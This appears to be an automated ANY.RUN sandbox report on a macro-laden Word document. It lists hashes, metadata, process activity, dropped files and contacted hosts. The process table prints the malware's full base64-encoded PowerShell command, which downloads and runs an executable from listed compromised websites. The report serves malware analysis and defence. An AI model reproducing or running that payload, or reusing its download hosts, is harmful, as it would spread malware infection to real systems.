analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

UNTITLED 397309931 W0019.doc

Full analysis: https://app.any.run/tasks/6de4e5e8-3daf-4f06-aa96-6a3f546dff03
Verdict: Malicious activity
Analysis date: May 24, 2019, 18:07:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Soft matrix, Subject: sensor, Author: Donnell Wyman, Comments: Intuitive out-of-the-box, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:52:00 2019, Last Saved Time/Date: Fri May 24 14:52:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 91, Security: 0
MD5:

4FCB038AD19CC9A9F745642BCCFDA5F1

SHA1:

4F1DBC4BB4917E30C233962BFC9906AC4E143F47

SHA256:

884E3793285193B5B331B1188D12A5EEE53A8CD2D4A5DE57A192CF8F6F2DE3CC

SSDEEP:

1536:PDMeOY5C6OJsdBpZW3+a9aCM0YvL3ozpycr25TjpM:P4eOY5CTsdAsCMYv0TjpM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3520)
    • PowerShell script executed

      • powershell.exe (PID: 3520)
    • Creates files in the user directory

      • powershell.exe (PID: 3520)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2836)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Soft matrix
Subject: sensor
Author: Donnell Wyman
Keywords: -
Comments: Intuitive out-of-the-box
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 13:52:00
ModifyDate: 2019:05:24 13:52:00
Pages: 1
Words: 15
Characters: 91
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Adams - Rolfson
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 105
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hansen
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2836"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\UNTITLED 397309931 W0019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3520powershell -nop -e JABJADYAWQBLAHUAdgA9ACcAVwBaAEcAegB3AFUAVgBwACcAOwAkAGwAUwBvAHcAcQBVAG4AIAA9ACAAJwA1ADIAMgAnADsAJABGAHAATwA1AFkAZgBZAD0AJwBwAGkAaQBoAEMAOQAnADsAJABOAGgANwBZAHIAOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbABTAG8AdwBxAFUAbgArACcALgBlAHgAZQAnADsAJABXADUAagB3ADgAaQA9ACcAegByADgAMABUAEkASwAnADsAJABTAGoAaQBrAG4ARQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQAYAAuAGAAdwBFAEIAYwBsAGkAZQBuAHQAOwAkAHYAMQBiADAARwAyAD0AJwBoAHQAdABwAHMAOgAvAC8AZwB1AGEAbgBsAGEAbgBjAG0ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADkAMAAwAGUAeQAwADEAOQA3ADMAOAAvAEAAaAB0AHQAcAA6AC8ALwBwAG8AdwBlAHIAYgBvAHgAdAByAGEAeQBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA4ADYAMgA4ADQALwBAAGgAdAB0AHAAOgAvAC8AcwBlAHYAYQBzAGgAcgBhAG0AbQBpAHQAaABhAGwAaQAuAGMAbwBtAC8AdAB1AGsAdwByAC8AaABqADcALwBAAGgAdAB0AHAAOgAvAC8AYQBwAHIAaQBnAGgAdABzAC4AYwBvAG0ALwBhAGIAbwB1AHQALwByAG0AdAB6AHUAMwAxADgALwBAAGgAdAB0AHAAOgAvAC8AYgAtAHMAdAB5AGwAZQBzAC4AbgBlAHQALwBpAG0AZwAvAHEAagBkAGwAeABvADEANQA3ADEAMQAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABsAHAANwBCAF8AcQA9ACcAdwBHADMAMwBqAHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABLADMAUgBCAE8AIABpAG4AIAAkAHYAMQBiADAARwAyACkAewB0AHIAeQB7ACQAUwBqAGkAawBuAEUALgBkAE8AVwBOAEwAbwBBAGQARgBJAEwAZQAoACQATQA0AEsAMwBSAEIATwAsACAAJABOAGgANwBZAHIAOAApADsAJABCAFAAbgAyAHcASgBLAD0AJwBXAHcAYwBrAHMAcABZACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATgBoADcAWQByADgAKQAuAGwARQBOAGcAdABIACAALQBnAGUAIAAzADIAMAAyADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABBAHIAVAAoACQATgBoADcAWQByADgAKQA7ACQAUAA3AFMAYgBPAEsAPQAnAFUAWQBxAFkAOABJAGYAUgAnADsAYgByAGUAYQBrADsAJABGAFQAagBmADkAcABqAD0AJwBqAFEAYgBpAFEASABiAGoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABaAHEATgBMAHoAawBxAD0AJwBRAEUAYQB2ADMAZgBKAHYAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 605
Read events
1 126
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
10

Dropped files

PID
Process
Filename
Type
2836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE80D.tmp.cvr
MD5:
SHA256:
3520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V7O9SE5T6XK7SHHTL8UF.temp
MD5:
SHA256:
2836WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66B44BBA.wmfwmf
MD5:51B3C34C7C19C8B345C9A1FDAE03DC73
SHA256:C1B327DF4466C9D7E58FE35EB6A8CBF7375E6B618679AF49185F0A7294B760BF
2836WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\163AF7CC.wmfwmf
MD5:6C93F38B7C50062136103BDA93DA2A17
SHA256:01EFCDE817F16E3DE3ADD20BB52E7C4A4552E9DD97346C195BBE8AF77757D1B9
2836WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:FA134ED21BC4961EBD57273F34CA2028
SHA256:D9ABFE77B85701203FFEA06E3DA980F26E75F3B46F9132451B58B424E8E09C2F
2836WINWORD.EXEC:\Users\admin\Downloads\~$TITLED 397309931 W0019.docpgc
MD5:A150799CF5A4A3FE33CFBA85803E9232
SHA256:174753B7FF5334E31E5520D87CC636AD774048F44ED6FC758602AD73B076E870
2836WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\UNTITLED 397309931 W0019.doc.LNKlnk
MD5:5D24EA91146CAE3F63811F04761EE496
SHA256:0FB1B7C1F1861BFBA34ACFF17E2C722019E15017F21A7139CDB600AF847E97A5
2836WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2445A0A77396BDF54E13CF88D259E053
SHA256:3B6A15B0A7BBC2D301BCC38624170DDCAED04BC8E8166D1E5A9BD836C3D09E38
2836WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\727DF473.wmfwmf
MD5:60F596F6BEA9CABC42020693B3FEC751
SHA256:13C6FB9782639770EF18D941100D56B074C5FFD7D3125B9C108152EE19D96E01
2836WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2A5DD5D.wmfwmf
MD5:B6D2DB29D16C8B8743D89485A2CA8392
SHA256:8B9B3F26ACF6EF58224A2F81AA9A3476BBB8CD6CFF25B2DF4AA0EB4667F70C21
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3520
powershell.exe
GET
404
94.130.52.106:80
http://powerboxtrays.com/wp-includes/86284/
DE
xml
345 b
suspicious
3520
powershell.exe
GET
404
59.106.19.44:80
http://aprights.com/about/rmtzu318/
JP
xml
345 b
suspicious
3520
powershell.exe
GET
404
166.62.28.118:80
http://sevashrammithali.com/tukwr/hj7/
US
xml
345 b
malicious
3520
powershell.exe
GET
404
202.181.97.13:80
http://b-styles.net/img/qjdlxo15711/
JP
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3520
powershell.exe
119.3.105.255:443
guanlancm.com
CN
unknown
3520
powershell.exe
166.62.28.118:80
sevashrammithali.com
GoDaddy.com, LLC
US
malicious
3520
powershell.exe
59.106.19.44:80
aprights.com
SAKURA Internet Inc.
JP
suspicious
3520
powershell.exe
94.130.52.106:80
powerboxtrays.com
Hetzner Online GmbH
DE
suspicious
3520
powershell.exe
202.181.97.13:80
b-styles.net
SAKURA Internet Inc.
JP
suspicious

DNS requests

Domain
IP
Reputation
guanlancm.com
  • 119.3.105.255
unknown
powerboxtrays.com
  • 94.130.52.106
suspicious
sevashrammithali.com
  • 166.62.28.118
malicious
aprights.com
  • 59.106.19.44
suspicious
b-styles.net
  • 202.181.97.13
unknown

Threats

No threats detected
No debug info